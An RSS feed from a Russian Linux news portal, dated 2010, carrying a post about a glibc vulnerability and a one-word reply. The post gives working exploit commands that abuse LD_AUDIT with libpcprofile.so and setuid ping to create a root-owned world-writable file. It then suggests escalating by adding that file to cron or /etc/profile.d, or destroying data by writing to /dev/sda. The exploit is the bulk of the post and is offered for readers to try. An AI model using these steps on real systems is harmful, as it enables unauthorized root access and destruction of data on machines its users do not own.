<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
					xmlns:content="http://purl.org/rss/1.0/modules/content/"
					xmlns:wfw="http://wellformedweb.org/CommentAPI/"
					xmlns:atom="http://www.w3.org/2005/Atom"
				  >
<channel>
<atom:link rel="self"  type="application/rss+xml"  href="http://rulinux.net/rss_from_sect_1_subsect_10_thread_31020"  />
<title>rulinux.net - Новости - Security - Ещё одна дыра в glibc</title>
<link>http://rulinux.net/</link>
<description><![CDATA[Портал о GNU/Linux и не только]]></description>
<image><title>rulinux.net - Новости - Security - Ещё одна дыра в glibc</title>
<link>http://rulinux.net/</link>
<url>http://rulinux.net/rss_icon.png</url>
</image>
<item>
<title>Re: Ещё одна дыра в glibc</title>
<link>https://rulinux.net/message.php?newsid=31020&amp;page=1#70070</link>
<guid>https://rulinux.net/message.php?newsid=31020&amp;page=1#70070</guid>
<pubDate>Tue, 26 Oct 2010 06:38:22 +0400</pubDate>
<description><![CDATA[<p>Решето!</p>]]></description>
</item>
<item>
<title>Ещё одна дыра в glibc</title>
<link>https://rulinux.net/message.php?newsid=31020&amp;page=1#70069</link>
<guid>https://rulinux.net/message.php?newsid=31020&amp;page=1#70069</guid>
<pubDate>Tue, 26 Oct 2010 06:28:42 +0400</pubDate>
<description><![CDATA[<p>Вскоре после обнаружения предыдущей дыры ( &nbsp;<a href="http://www.lor-ng.org/message.php?newsid=30924">http://www.lor-ng.org/message.php?newsid=30924</a> ), которая, однако, работала только на redhat-based дистрибутивах, опубликованы сведения о новой дырке в основной библиотеке большинства дистрибутивов -- glibc. На этот раз подвержены большинство дистрибутивов. Желающие узнать механизм работы могут посмотреть его по ссылке, остальным интересующим можно сразу перейти к изучению эксплоита:</p><p><fieldset style="border: 1px dashed black; padding:0px;"><ol style="background-color:#3d3d3d;" start="1"><li style="background-color:#000000; padding-left: 5px; color: gray">&nbsp;umask 0<li style="background-color:#000000; padding-left: 5px; color: gray">&nbsp;ls -l /lib/libpcprofile.so  # проверяем наличие необходимой библиотеки; можно использовать и другие библиотеки<li style="background-color:#000000; padding-left: 5px; color: gray">&nbsp;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/world_writeable_file" ping<li style="background-color:#000000; padding-left: 5px; color: gray">&nbsp;ls -l /world_writeable_file # проверяем наличие вновь созданного файла и права на него (должны быть 0666)<li style="background-color:#000000; padding-left: 5px; color: gray">&nbsp;</ol></fieldset></p><p>Дальше всё зависит только от вашей фантазии. Авторы на opennet-е запихнули этот файл в список заданий cron-а. Другой вариант -- поместить его в /etc/profile.d. Выразившие особое рвение предлагают сразу писать в /dev/sda.</p><br>>>> <a href="http://www.opennet.ru/opennews/art.shtml?num=28390">Подробнее</a>]]></description>
</item>
</channel>
</rss>